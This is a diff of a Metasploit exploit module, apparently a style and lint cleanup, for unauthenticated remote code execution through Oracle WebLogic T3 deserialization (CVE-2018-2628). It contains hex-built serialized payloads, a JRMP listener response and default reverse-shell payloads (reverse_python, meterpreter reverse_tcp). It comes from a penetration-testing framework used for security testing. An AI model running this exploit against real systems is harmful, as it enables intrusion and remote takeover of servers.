@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ManualRanking
 
@@ -11,50 +10,57 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::TcpServer
   include Msf::Exploit::Powershell
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name' => 'Oracle Weblogic Server Deserialization RCE',
-      'Description' => %q{
-        An unauthenticated attacker with network access to the Oracle Weblogic
-        Server T3 interface can send a serialized object to the interface to
-        execute code on vulnerable hosts.
-      },
-      'Author' =>
-        [
-        'brianwrf',     # EDB PoC
-        'Jacob Robles'  # Metasploit Module
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Oracle Weblogic Server Deserialization RCE',
+        'Description' => %q{
+          An unauthenticated attacker with network access to the Oracle Weblogic
+          Server T3 interface can send a serialized object to the interface to
+          execute code on vulnerable hosts.
+        },
+        'Author' => [
+          'brianwrf', # EDB PoC
+          'Jacob Robles' # Metasploit Module
         ],
-      'License' => MSF_LICENSE,
-      'References' =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           ['CVE', '2018-2628'],
           ['EDB', '44553']
         ],
-      'Privileged' => false,
-      'Targets' =>
-        [
-          [ 'Unix',
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix',
             'Platform' => 'unix',
             'Arch' => ARCH_CMD,
-            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'},
+            'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_python' },
             'Payload' => {
               'Encoder' => 'cmd/ifs',
               'BadChars' => ' ',
-              'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'}
+              'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'python' }
             }
           ],
-          [ 'Windows',
+          [
+            'Windows',
             'Platform' => 'win',
             'Payload' => {},
-            'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
+            'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }
           ]
         ],
-      'DefaultTarget' => 0,
-      'DefaultOptions' =>
-        {
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
           'RPORT' => 7001
         },
-      'DisclosureDate' => '2018-04-17'))
+        'DisclosureDate' => '2018-04-17',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
   end
 
   def check
@@ -91,15 +97,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def gen_resp
     if target.name == 'Windows'
-      pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
-      tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join
+      pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true })
+      tmp_dat = pwrshl.each_byte.map { |b| b.to_s(16) }.join
     else
       nix_cmd = payload.encoded
       nix_cmd.prepend('/bin/sh -c ')
-      tmp_dat = nix_cmd.each_byte.map {|b| b.to_s(16)}.join
+      tmp_dat = nix_cmd.each_byte.map { |b| b.to_s(16) }.join
     end
 
-    mycmd = (tmp_dat.length >> 1).to_s(16).rjust(4,'0')
+    mycmd = (tmp_dat.length >> 1).to_s(16).rjust(4, '0')
     mycmd << tmp_dat
 
     # Response data taken from JRMPListener generated data:
@@ -192,6 +198,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # (or as long as the server was listening).
     vprint_status("Comparing host: #{client.peerhost}")
     if @met_sent.include?(client.peerhost) then return end
+
     @met_sent << client.peerhost
 
     vprint_status("Sending payload to client: #{client.peerhost}")
@@ -199,11 +206,11 @@ class MetasploitModule < Msf::Exploit::Remote
     # Response format determined by watching network traffic
     # generated by EDB PoC
     accept_conn = '4e00'
-    raccept_conn = client.peerhost.each_byte.map {|b| b.to_s(16)}.join
-    accept_conn << (raccept_conn.length >> 1).to_s(16).rjust(2,'0')
+    raccept_conn = client.peerhost.each_byte.map { |b| b.to_s(16) }.join
+    accept_conn << (raccept_conn.length >> 1).to_s(16).rjust(2, '0')
     accept_conn << raccept_conn
     accept_conn << '0000'
-    accept_conn << client.peerport.to_s(16).rjust(4,'0')
+    accept_conn << client.peerport.to_s(16).rjust(4, '0')
 
     client.put([accept_conn].pack('H*'))
     client.put([@resp].pack('H*'))
@@ -308,14 +315,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
     unicast_srvhost = srvhost.each_byte.map { |b| b.to_s(16) }.join
     unicast_dat = '000a556e696361737452656600'
-    unicast_dat << (unicast_srvhost.length >> 1).to_s(16).rjust(2,'0')
+    unicast_dat << (unicast_srvhost.length >> 1).to_s(16).rjust(2, '0')
     unicast_dat << unicast_srvhost
     unicast_dat << '0000'
-    unicast_dat << srvport.to_s(16).rjust(4,'0')
+    unicast_dat << srvport.to_s(16).rjust(4, '0')
     unicast_dat << '000000004e18654b000000000000000000000000000000'
     unicast_dat << '78'
 
-    payload << ((unicast_dat.length >> 1) - 1).to_s(16).rjust(2,'0')
+    payload << ((unicast_dat.length >> 1) - 1).to_s(16).rjust(2, '0')
     payload << unicast_dat
 
     payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'
@@ -327,7 +334,7 @@ class MetasploitModule < Msf::Exploit::Remote
     payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'
     payload << '6f3b290000001b7878fe00ff'
 
-    data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')
+    data = ((payload.length >> 1) + 4).to_s(16).rjust(8, '0')
     data << payload
 
     sock.put([data].pack('H*'))
